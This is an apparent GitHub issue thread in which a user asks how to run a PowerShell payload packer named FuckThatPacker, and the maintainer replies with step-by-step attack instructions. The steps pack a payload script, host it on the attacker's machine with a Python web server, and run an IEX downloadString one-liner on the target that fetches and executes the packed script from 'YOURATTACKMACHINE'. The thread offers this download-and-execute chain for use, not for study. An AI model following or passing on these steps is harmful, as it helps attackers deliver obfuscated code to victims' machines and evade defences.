### ISSUE TITLE
How to RUN

### ISSUE THREAD

**Issue by YasirAsim** [Unknow101/FuckThatPacker#1]
Hello, I'm new to CLI enviroment, So can you please explain, how can I run this on Window 10?
Which commands do I need to execute on CMD? 
Thank

**Comment by Unknow101** [comment]
Hello,
you have to run the tool on your hacking machine like so :
python FuckThatPacker.py -k 32 -p /root/payload.ps1 -o final.ps1

Then host the file in a web server like this :
python -m SimpleHTTPServer 80
(in the same directory where you save the file)

Then just run IEX(new-object net.webclient).downloadString("http://YOURATTACKMACHINE/final.ps1")

The packed script should run
